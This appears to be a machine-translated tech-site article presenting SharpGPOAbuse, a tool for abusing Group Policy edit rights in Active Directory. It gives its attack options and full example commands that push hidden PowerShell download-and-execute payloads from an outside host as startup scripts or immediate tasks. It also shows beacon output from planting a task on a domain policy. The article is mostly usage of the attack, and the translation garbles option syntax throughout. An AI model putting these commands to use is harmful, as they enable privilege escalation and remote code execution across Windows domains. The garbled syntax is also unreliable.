Shulou(Shulou.com)06/03 Report--

This article mainly explains "how to control the object through the user's editing authority to control the group policy object". Interested friends may wish to have a look. The method introduced in this paper is simple, fast and practical. Let's let the editor take you to learn how to control the group policy object through the user's editing rights.

About SharpGPOAbuse

SharpGPOAbuse is a powerful .NET application. SharpGPOAbuse is developed based on C #, which can help researchers use the editing rights of users on a group policy object (GPO) in the target system to invade and control objects controlled by the group policy object (GPO).

Project acquisition

Researchers can use the following commands to clone the source code of the project locally:

Git clone https://github.com/FSecureLABS/SharpGPOAbuse.git code compilation

Make sure that the necessary NuGet packages on the local host are installed properly, and then you can use Visual Studio to import the project and build it directly.

Tool uses Usage: SharpGPOAbuse.exe attack type

The current version of SharpGPOAbuse supports the following attack types:

Option

Description

-- AddUserRights

Add permissions to the user

-- AddLocalAdmin

Add a user to the local administrators group

-- AddComputerScript

Add a new computer startup script

-- AddUserScript

Configure a user login script

-- AddComputerTask

Configure a computer to perform tasks immediately

-- AddUserTask

Add a task to the user that is executed immediately

Attack option add user permissions Options required to add new user rights:--UserRights adds new permissions to the user, which is case-sensitive and can use a comma-separated list. -- UserAccount sets the user account to which new permissions need to be added. -- the name of the GPO with a security vulnerability in GPOName. Example: SharpGPOAbuse.exe-- AddUserRights-- UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight"-- UserAccount bob.smith-- GPOName "Vulnerable GPO" to add an account name that needs to be added to the local administrator group for the local administrator Options required to add a new local admin:--UserAccount setting. -- the name of the GPO with a security vulnerability in GPOName. Example: SharpGPOAbuse.exe-- AddLocalAdmin-- UserAccount bob.smith-- GPOName "Vulnerable GPO" configure a user or computer login script Options required to add a new user or computer startup script:--ScriptName to set the name of the new startup script. -- ScriptContents sets the contents of the new startup script. -- the name of the GPO with a security vulnerability in GPOName. Example: SharpGPOAbuse.exe-- AddUserScript-- ScriptName StartupScript.bat-- ScriptContents "powershell.exe-nop-w hidden-c\" IEX ((new-object net.webclient) .downloadstring ('http://10.1.1.10:80/a'))\""-- GPOName "Vulnerable GPO")

If you only want to execute a malicious script against a specific user or computer controlled by GPO, you can add an if statement to the malicious script:

SharpGPOAbuse.exe-- AddUserScript-- ScriptName StartupScript.bat-- ScriptContents "if% username%== powershell.exe-nop-w hidden-c\" IEX ((new-object net.webclient) .downloadstring ('http://10.1.1.10:80/a'))\""-- GPOName "Vulnerable GPO" task ") configures the task that the computer or user executes immediately Options required to add a new computer or user immediate task:-- TaskName sets the name of the new computer task. Set the name of the new computer task.--Author set up the developer of the new task (you can use the DA account). -- the command that Command needs to execute-- the parameter that Arguments passes to the command. -- the name of the GPO with a security vulnerability in GPOName. Additional User Task Options:--FilterEnabled enables task filters. Enable Target Filtering for user immediate tasks.--TargetUsername target users, malicious tasks will only be run against specific users in the format\. -- the SID of the TargetUserSID target user. Additional Computer Task Options:--FilterEnabled enables task filters. -- the name of the TargetDnsName target DNS. Malicious tasks will only run against the target host. Example: SharpGPOAbuse.exe-- AddComputerTask-- TaskName "Update"-- Author DOMAIN\ Admin-- Command "cmd.exe"-- Arguments "/ c powershell.exe-nop-w hidden-c\" IEX ((new-object net.webclient). Downloadstring ('http://10.1.1.10:80/a'))\""-GPOName "Vulnerable GPO")

If you only want to run malicious tasks against specific users or computers controlled by GPO, you can refer to the following command:

SharpGPOAbuse.exe-- AddComputerTask-- TaskName "Update"-- Author DOMAIN\ Admin-- Command "cmd.exe"-- Arguments "/ c powershell.exe-nop-w hidden-c\" IEX ((new-object net.webclient) .downloadstring ('http://10.1.1.10:80/a'))\""-- GPOName "Vulnerable GPO"-- FilterEnabled-- TargetDnsName target.domain.com extra option)

Option

Description

-- DomainController

Set up target domain controller

-- Domain

Set the target domain name

-- Force

Overwrite existing files

Sample tool output beacon > execute-assembly / root/Desktop/SharpGPOAbuse.exe-- AddComputerTask-- TaskName "New Task"-- Author EUROPA\ Administrator-- Command "cmd.exe"-- Arguments "/ c powershell.exe-nop-w hidden-c\" IEX ((new-object net.webclient) .downloadstring ('http://10.1.1.141:80/a'))\""-- GPOName "Default Server Policy" [*] Tasked beacon to run .NET program: SharpGPOAbuse_final) .exe-- AddComputerTask-- TaskName "New Task"-- Author EUROPA\ Administrator-- Command "cmd.exe"-- Arguments "/ c powershell.exe-nop-w hidden-c\" IEX ((new-object net.webclient) .downloadstring ('http://10.1.1.141:80/a'))\""-- GPOName "Default Server Policy" [+] host called home) Sent: 171553 bytes [+] received output: [+] Domain = europa.com [+] Domain Controller = EURODC01.europa.com [+] Distinguished Name = CN=Policies,CN=System,DC=europa DC=com [+] GUID of "Default Server Policy" is: {877CB769-3543-40C6-A757-F2DF4E5E28BD} [+] Creating file\\ europa.com\ SysVol\ europa.com\ Policies\ {877CB769-3543-40C6-A757-F2DF4E5E28BD}\ Machine\ Preferences\ ScheduledTasks\ ScheduledTasks.xml [+] versionNumber attribute changed successfully [+] The version number in GPT.ini was increased successfully. [+] The GPO was modified to include a new immediate task Wait for the GPO refresh cycle. [+] Done At this point, I believe you have a deeper understanding of "how to control the group policy object through the user's editing rights". You might as well do it in practice. Here is the website, more related content can enter the relevant channels to inquire, follow us, continue to learn!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.